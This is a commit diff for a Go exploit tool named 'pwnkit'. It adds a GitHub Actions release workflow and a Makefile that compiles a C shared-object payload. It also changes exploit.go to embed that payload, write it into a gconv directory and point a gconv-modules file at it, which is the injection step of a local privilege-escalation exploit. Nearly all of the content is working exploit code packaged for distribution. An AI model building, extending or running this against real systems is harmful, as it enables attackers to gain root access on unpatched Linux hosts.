Embed payload in go bin

.github/workflows/autorelease.yml

@@ -0,0 +1,36 @@
+name: Release
+on:
+  push:
+    tags: ["v[0-9]+.[0-9]+.[0-9]+"]
+    branches: ["master"]
+
+jobs:
+  tagged-release:
+    name: "Tagged Release"
+    if: startsWith( github.ref, 'refs/tags/v')
+    runs-on: "ubuntu-latest"
+    timeout-minutes: 45
+
+    steps:
+      - name: Go 1.17
+        uses: actions/setup-go@v2
+        with:
+          go-version: ^1.17
+        id: go
+
+      - name: Check Out Code
+        uses: actions/checkout@v2
+
+      - name: Git Fetch Tags
+        run: git fetch --prune --unshallow --tags -f
+
+      - name: Make
+        run: make
+
+      - name: Release
+        uses: "marvinpinto/action-automatic-releases@latest"
+        with:
+          repo_token: "${{ secrets.GITHUB_TOKEN }}"
+          prerelease: false
+          files: |
+            ./release/*

Makefile

@@ -0,0 +1,5 @@
+
+
+main:
+	gcc payload/payload.c -o payload.so -shared -fPIC
+	go build -trimpath -ldflags="-s -w" -o pwnkit exploit.go

exploit.go

@@ -1,14 +1,19 @@
 package main
 
 import (
+	_ "embed"
 	"fmt"
 	"io/ioutil"
 	"log"
 	"os"
+	"path/filepath"
 	"strings"
 	"syscall"
 )
 
+//go:embed payload.so
+var payload []byte
+
 const (
 	fake_charset = "payload"
 	gconv_dir    = "gconv"
@@ -26,7 +31,8 @@ func wirte_gconv_module() (err error) {
 	if err != nil {
 		return err
 	}
-	replace := directory + "/payload.so"
+	ioutil.WriteFile(filepath.Join(directory, "payload.so"), payload, 0o0755)
+	replace := filepath.Join(directory, "payload.so")
 	content := strings.Replace(gconv_content, "${REPLACE}", replace, -1)
 	if err := ioutil.WriteFile(fmt.Sprintf("%s/gconv-modules", gconv_dir), []byte(content), 0o0755); err != nil {
 		log.Fatal(err)